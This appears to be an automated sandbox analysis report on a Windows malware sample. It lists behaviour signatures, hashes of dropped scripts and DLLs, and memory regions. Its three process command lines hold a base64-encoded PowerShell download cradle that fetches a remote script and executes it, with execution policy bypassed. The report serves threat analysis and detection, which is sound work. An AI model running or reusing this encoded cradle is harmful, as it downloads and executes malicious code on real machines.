C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESA78B.tmpMD5
5ffc8022f7dca3f3fe9f6404b97885b3
SHA1c900bf19d0cec348e3b03c304fe9b38e09c94b04
SHA25603bd353d66aff99b2e15ffe4c5602561c627a395a4e7cfb43c656f9ef6072e2c
SHA512d4c5db4bbf4c0e143e4eb5b04485a64be31eb43c7144a738829dc52f82ce15e28695eaba2dd013ffbdb2c8c43a78a5792bb74286e8ad4b34c3a4803ed4b5687e
-
C:\Users\Admin\AppData\Local\Temp\RESAD77.tmpMD5
61baf1e29429e277b58293586f4b54d0
SHA1865b60916d313059a67db1b099b4f5676dac9a7f
SHA25656440390b1b06339fc4039148e654d814fdfcdfd5084d0c2494f7810ffd92175
SHA5129c2e58571c5d7c879dcc04cb66255134579b3b8fa028e8a8c8d0bb09cd5d38e66f951498151a2076fea89bf26979e67140dcc637f181642c6874d947d876a9ff
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
906cfa662334c891a46689a3f1da9330
SHA1eeea78f5017291d2bcc9455977849c075077a14a
SHA2565d411460ba068d64bdafd0c3697d1bbe19685789c1c086d6b6e9073fbb914275
SHA5127d25845ca882e48df6c2b9c8646990d5dcc396f60c587e5fafce1841624b009d44542e93488a71983c9d8f71c9a001b06d4602b8be6f958435753490f8a7196f
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.dllMD5
8949f891fd5c4bd43ec267d70039e43d
SHA195951fbd24f258f2dce531e98844f1f91ee4dacb
SHA256ebb92517328a31e522cb30152686330f66969d37458ec0a156c5eb2b25e125c3
SHA5122802f5ebf8e51ba562b59f1fdf90f8c203c0f31ea45d1c7da58b251be2fc250f17a583fad2c307dec59dcdcc3c0b035155e0cad5f0111fe629c72df2739de61e
-
C:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.dllMD5
962faacb74d4257e90d8affde3134a97
SHA17a2c28bd66672c423a189abc5f2dddc2972d867e
SHA25666c24ab3956f297e9f5ab6295658fe1dc9f5a7d28e15ba505e42a0dd6a626911
SHA51235eb3fd1898aac3f119af5fbb47be5fb600c5adebac3e6eec35fe4e0c3994b63323249cdf25feb412ec7c8cecec65f05d8d257e3b1805721d8ff90791a0029d7
-
\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\CSC2D2376043F0E43B4AAFAFCE07CD4643.TMPMD5
9fdc502fbdac73694ca152e18e2906cb
SHA1e7033b7c87f39bd7df23419a6061d8a76f30a281
SHA2565d061933f05ee0cd73effbe37956104731147e1484f658b0b4fee673ddc12bd0
SHA51285d8c6d4084617715c523f6ab9b8cc038925490911e8bd9f26a45a996e929bea834fa8e0a8860cb5cbf11b140227cc6922d2793dd45fc3ffa8ab66617db057d5
-
\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.cmdlineMD5
ed93f3a391533a10becf9eb24caf0e30
SHA1e038f5fc24363ab246907a1e329c809fb7e38251
SHA25629e634e47ab6b85fdfd91c9e32555dede9e237932f8cb515516117c14a887fd9
SHA512840470dd197ce50c3e72082af5bf993e265337a415c43685b1f20cd6d424998edb7efa898487f7089294bbcdff36b2989442e67d8f870b0b47a64865f2239109
-
\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\CSC27CACF1B9A6548F784A5D2794A43D262.TMPMD5
4fbfd005c3465e4ca5b9c8fa003cb9c5
SHA131e53773310c41d1e516fd93784f2a40cb435953
SHA2562423d8642f8f1e70fa9ed8af3ec7667ff31f74328e5032b52264d69bb76e70f2
SHA51227a795f4adff9589aa479b81d186f8be3c8b63d65d1cbdfce8851972d859dfda9c5c6b55fa09de01422fb38bf08c85ca4128d0a91b7a53061e2142750d9a8e7c
-
\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.cmdlineMD5
e9e6879a9433c28ea29428f095a98f62
SHA1d1cb8d7735f1f0e0bee30a92b1092b6577b96bfa
SHA256ef05f5e5a88d8909a9327f11f995dc725fe64ec3bfd17571a044c5719ccd0695
SHA512cea57b366d25a6b6de5e7209602b66d29270596aa286389360ece781035c06fad71bd729f08f27246a6183dfd417c73ecf09e0810ff0cf3cc8480ca4a342864e
-
\Windows\Branding\mediasrv.pngMD5
b5a099246bec080e384b19fff56bb2cc
SHA16f26990f3f471717c97dca80a2ccbf2eac952280
SHA256352fa41bf3319718aa0346e6feb3032c10241ca746ffd8acfe7cf5fe222be991
SHA51269dd0038b5911eb8a239262605283e1854b3a9c32da7665990cc2d38572c28f33f63ef3286abf85b82378e2cc791cb208e5de2e2c263286f088c6d9239060604
-
\Windows\Branding\mediasvc.pngMD5
cc59270baf11196c3414204c319f3be9
SHA1038e2aa526fad8eb762e21e9aed7eab4531d4e11
SHA2565c5890fdbc0c59e911168a0b618436e8fb76be6053ab0bfa2eec4f7f0e9267e6
SHA5128e54a2a636d2b745a9d8e0e51fd54ccb504ec348f86730b951c45feb21f743be448401f72f6d3498a78a9aa6eb4d46211c424fe8c8cb3eeaf6f2d8bc5dd6a632
-
memory/352-331-0x0000000000000000-mapping.dmp
-
memory/400-312-0x0000000000000000-mapping.dmp
-
memory/656-332-0x0000000000000000-mapping.dmp
-
memory/696-334-0x0000000000000000-mapping.dmp
-
memory/708-422-0x0000000000000000-mapping.dmp
-
memory/712-150-0x0000000000000000-mapping.dmp
-
memory/724-273-0x0000000000000000-mapping.dmp
-
memory/1064-143-0x0000000000000000-mapping.dmp
-
memory/1152-421-0x0000000000000000-mapping.dmp
-
memory/1244-322-0x0000000000000000-mapping.dmp
-
memory/1516-153-0x0000000000000000-mapping.dmp
-
memory/1524-224-0x000002022D940000-0x000002022D942000-memory.dmpFilesize
8KB
-
memory/1524-214-0x0000000000000000-mapping.dmp
-
memory/1524-257-0x000002022D946000-0x000002022D948000-memory.dmpFilesize
8KB
-
memory/1524-258-0x000002022D948000-0x000002022D94A000-memory.dmpFilesize
8KB
-
memory/1524-225-0x000002022D943000-0x000002022D945000-memory.dmpFilesize
8KB
-
memory/1532-252-0x0000000000000000-mapping.dmp
-
memory/1800-275-0x0000000000000000-mapping.dmp
-
memory/1924-336-0x0000000000000000-mapping.dmp
-
memory/1940-337-0x0000000000000000-mapping.dmp
-
memory/1976-321-0x0000000000000000-mapping.dmp
-
memory/1996-340-0x0000000000000000-mapping.dmp
-
memory/2064-313-0x0000000000000000-mapping.dmp
-
memory/2084-339-0x0000000000000000-mapping.dmp
-
memory/2180-327-0x0000000000000000-mapping.dmp
-
memory/2188-329-0x0000000000000000-mapping.dmp
-
memory/2212-328-0x0000000000000000-mapping.dmp
-
memory/2256-316-0x0000000000000000-mapping.dmp
-
memory/2420-341-0x0000000000000000-mapping.dmp
-
memory/2420-354-0x000001FBDCA70000-0x000001FBDCA72000-memory.dmpFilesize
8KB
-
memory/2420-355-0x000001FBDCA73000-0x000001FBDCA75000-memory.dmpFilesize
8KB
-
memory/2420-356-0x000001FBDCA76000-0x000001FBDCA78000-memory.dmpFilesize
8KB
-
memory/2420-365-0x000001FBDCA78000-0x000001FBDCA79000-memory.dmpFilesize
4KB
-
memory/2448-317-0x0000000000000000-mapping.dmp
-
memory/2540-333-0x0000000000000000-mapping.dmp
-
memory/2568-140-0x0000000000000000-mapping.dmp
-
memory/3056-319-0x0000000000000000-mapping.dmp
-
memory/3144-338-0x0000000000000000-mapping.dmp
-
memory/3152-326-0x0000000000000000-mapping.dmp
-
memory/3440-173-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-172-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-184-0x000001E86CE86000-0x000001E86CE88000-memory.dmpFilesize
8KB
-
memory/3440-182-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-171-0x0000000000000000-mapping.dmp
-
memory/3440-174-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-181-0x000001E86CE83000-0x000001E86CE85000-memory.dmpFilesize
8KB
-
memory/3440-175-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-180-0x000001E86CE80000-0x000001E86CE82000-memory.dmpFilesize
8KB
-
memory/3440-178-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-177-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-223-0x000001E86CE88000-0x000001E86CE8A000-memory.dmpFilesize
8KB
-
memory/3460-121-0x000001687F7B3000-0x000001687F7B5000-memory.dmpFilesize
8KB
-
memory/3460-122-0x000001687F7B5000-0x000001687F7B6000-memory.dmpFilesize
4KB
-
memory/3460-123-0x000001687F7B6000-0x000001687F7B7000-memory.dmpFilesize
4KB
-
memory/3460-118-0x0000016838340000-0x000001683860E000-memory.dmpFilesize
2.8MB
-
memory/3460-120-0x000001687F7B0000-0x000001687F7B2000-memory.dmpFilesize
8KB
-
memory/3500-320-0x0000000000000000-mapping.dmp
-
memory/3672-274-0x0000000000000000-mapping.dmp
-
memory/3696-318-0x0000000000000000-mapping.dmp
-
memory/3780-323-0x0000000000000000-mapping.dmp
-
memory/3952-164-0x000001FB57F18000-0x000001FB57F19000-memory.dmpFilesize
4KB
-
memory/3952-157-0x000001FB58040000-0x000001FB58041000-memory.dmpFilesize
4KB
-
memory/3952-128-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-124-0x0000000000000000-mapping.dmp
-
memory/3952-125-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-162-0x000001FB586A0000-0x000001FB586A1000-memory.dmpFilesize
4KB
-
memory/3952-126-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-127-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-129-0x000001FB3FD20000-0x000001FB3FD21000-memory.dmpFilesize
4KB
-
memory/3952-163-0x000001FB58A30000-0x000001FB58A31000-memory.dmpFilesize
4KB
-
memory/3952-130-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-131-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-132-0x000001FB580A0000-0x000001FB580A1000-memory.dmpFilesize
4KB
-
memory/3952-133-0x000001FB57F10000-0x000001FB57F12000-memory.dmpFilesize
8KB
-
memory/3952-134-0x000001FB57F13000-0x000001FB57F15000-memory.dmpFilesize
8KB
-
memory/3952-149-0x000001FB57F16000-0x000001FB57F18000-memory.dmpFilesize
8KB
-
memory/3952-136-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-147-0x000001FB57EF0000-0x000001FB57EF1000-memory.dmpFilesize
4KB
-
memory/4008-330-0x0000000000000000-mapping.dmp
-
memory/4068-335-0x0000000000000000-mapping.dmp